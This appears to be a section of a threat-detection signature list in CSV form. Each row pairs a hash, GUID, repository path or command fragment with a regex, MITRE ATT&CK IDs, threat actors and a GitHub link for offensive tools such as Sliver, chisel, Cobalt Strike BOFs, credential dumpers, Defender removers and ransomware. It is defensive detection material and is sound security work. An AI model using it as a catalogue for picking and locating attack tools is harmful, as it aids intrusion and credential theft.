"*ccb9d0f9cd95c1665d9646771f7e21af912106f7cc7541c338552b66ca0df512*",".{0,1000}ccb9d0f9cd95c1665d9646771f7e21af912106f7cc7541c338552b66ca0df512.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37788"
"*ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852*",".{0,1000}ccbc5c84af4045835e6b001cdf845d63802e081cbb97d9625c12d8d0f9b6f852.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37789"
"*ccc0e2dc580a30ad79f49871b99eedb891d9044e801bd633ba0af0505b8462b6*",".{0,1000}ccc0e2dc580a30ad79f49871b99eedb891d9044e801bd633ba0af0505b8462b6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37790"
"*ccc1e522d2aed22b0cbc91a47fd0513689add203aa8e6d8a0857a430b00ab4a6*",".{0,1000}ccc1e522d2aed22b0cbc91a47fd0513689add203aa8e6d8a0857a430b00ab4a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37791"
"*ccd3694e0110b8416c04ad17e4d3f1e5fc9b724e29c942a70f3ff2283c4f8a79*",".{0,1000}ccd3694e0110b8416c04ad17e4d3f1e5fc9b724e29c942a70f3ff2283c4f8a79.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37794"
"*ccd7652de457311135874574da9dc2cfdbb5cfc121c0ae158e85b78c311dd506*",".{0,1000}ccd7652de457311135874574da9dc2cfdbb5cfc121c0ae158e85b78c311dd506.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37795"
"*ccde1cee6a570b7e54c7e02228a65a3a25a968d163314d072104fe0113ae5f7b*",".{0,1000}ccde1cee6a570b7e54c7e02228a65a3a25a968d163314d072104fe0113ae5f7b.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","37797"
"*cce28e2789e65c0be2fdbf5605521babc06ada19020bb00d9314cd37757854e5*",".{0,1000}cce28e2789e65c0be2fdbf5605521babc06ada19020bb00d9314cd37757854e5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37799"
"*cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877*",".{0,1000}cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37800"
"*ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb*",".{0,1000}ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37802"
"*ccf676c0d9c215b6de3a3219688e3f5e20a7a21191ef6a25b382c2c0ec19a7e2*",".{0,1000}ccf676c0d9c215b6de3a3219688e3f5e20a7a21191ef6a25b382c2c0ec19a7e2.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37805"
"*ccf7f162f257c3cf8286009cfcd0869bc7bd78d38635f1b473d89c737b8fd2ff*",".{0,1000}ccf7f162f257c3cf8286009cfcd0869bc7bd78d38635f1b473d89c737b8fd2ff.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37806"
"*CCHOST=127.0.0.1*/tmp/c2*",".{0,1000}CCHOST\=127\.0\.0\.1.{0,1000}\/tmp\/c2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37809"
"*cckuailong/reapoc*",".{0,1000}cckuailong\/reapoc.{0,1000}","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","N/A","7","681","219","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z","37810"
"*cclauss/WinPwnage*",".{0,1000}cclauss\/WinPwnage.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","37811"
"*CcmExec might not be installed on target*",".{0,1000}CcmExec\smight\snot\sbe\sinstalled\son\starget.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","37812"
"*CcmExec service not accessible on remote system! :(*",".{0,1000}CcmExec\sservice\snot\saccessible\son\sremote\ssystem!\s\:\(.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","37813"
"*CCob/BOF.NET*",".{0,1000}CCob\/BOF\.NET.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37814"
"*CCob/DRSAT*",".{0,1000}CCob\/DRSAT.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","37815"
"*CCob/lsarelayx*",".{0,1000}CCob\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","37816"
"*CCob/MirrorDump*",".{0,1000}CCob\/MirrorDump.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","37817"
"*CCob/Shwmae*",".{0,1000}CCob\/Shwmae.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","37818"
"*CCob/SweetPotato*",".{0,1000}CCob\/SweetPotato.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","37819"
"*CCob/ThreadlessInject*",".{0,1000}CCob\/ThreadlessInject.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","37820"
"*ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid.onion*",".{0,1000}ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37821"
"*cd  DuckDuckC2*",".{0,1000}cd\s\sDuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","0","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","37822"
"*cd ./whereami/*",".{0,1000}cd\s\.\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","0","#linux","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","37824"
"*cd ffuf*",".{0,1000}cd\sffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","37825"
"*cd golang_c2*",".{0,1000}cd\sgolang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","37826"
"*cd inceptor*",".{0,1000}cd\sinceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","37827"
"*cd katoolin3*",".{0,1000}cd\skatoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","0","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","37828"
"*cd koadic*",".{0,1000}cd\skoadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","37829"
"*cd ligolo*",".{0,1000}cd\sligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","37830"
"*cd PurplePanda*",".{0,1000}cd\sPurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","37831"
"*cd PyExfil*",".{0,1000}cd\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","37832"
"*cd05b7676886e560400643e3852e64483cee95f4741ec8a930c7b1f68479835a*",".{0,1000}cd05b7676886e560400643e3852e64483cee95f4741ec8a930c7b1f68479835a.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","0","#filehash","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","37833"
"*cd075baa8305d9767316d5a2cc0ee60daf1f194a3c4b0d3386d1f8bd80f44907*",".{0,1000}cd075baa8305d9767316d5a2cc0ee60daf1f194a3c4b0d3386d1f8bd80f44907.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","37834"
"*cd0b70d141e20db2b6ea5fa1c07a5310767f510a56ae8af7724fbd40f263bd6f*",".{0,1000}cd0b70d141e20db2b6ea5fa1c07a5310767f510a56ae8af7724fbd40f263bd6f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37835"
"*cd16f1b53cc6746e79f6e2bed66d4017b9eee843fb52976fba170349cb0b7c3e*",".{0,1000}cd16f1b53cc6746e79f6e2bed66d4017b9eee843fb52976fba170349cb0b7c3e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37838"
"*cd1c194264bf41748733be39fdcaa8ac2166f1121919a3b2eae1f03d873773a1*",".{0,1000}cd1c194264bf41748733be39fdcaa8ac2166f1121919a3b2eae1f03d873773a1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37840"
"*cd1ddc6d2dd63df1769aa54a0febd2c11218f54350d8284c10e5fd2d396a5d7c*",".{0,1000}cd1ddc6d2dd63df1769aa54a0febd2c11218f54350d8284c10e5fd2d396a5d7c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37843"
"*cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d*",".{0,1000}cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37844"
"*CD257C0A-9071-42B4-A2FF-180622DBCA96*",".{0,1000}CD257C0A\-9071\-42B4\-A2FF\-180622DBCA96.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","37847"
"*cd2e2beff40caf56b5102947d81e825f44b8df24d84f5dc49b1c850f4dca40a9*",".{0,1000}cd2e2beff40caf56b5102947d81e825f44b8df24d84f5dc49b1c850f4dca40a9.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37848"
"*cd310c1827d7f9686c56b7ca259e8782a17964c23e93c932ae201f78ab046b20*",".{0,1000}cd310c1827d7f9686c56b7ca259e8782a17964c23e93c932ae201f78ab046b20.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","37849"
"*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*",".{0,1000}CD3578F6\-01B7\-48C9\-9140\-1AFA44B3A7C0.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","37850"
"*cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a*",".{0,1000}cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37851"
"*cd40dbcdae84b1c8606f29342066547069ed5a33*",".{0,1000}cd40dbcdae84b1c8606f29342066547069ed5a33.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","37854"
"*cd4104d015dd44e17397a87018f35850f0363f089b3232e5306addbd2b6b807a*",".{0,1000}cd4104d015dd44e17397a87018f35850f0363f089b3232e5306addbd2b6b807a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37855"
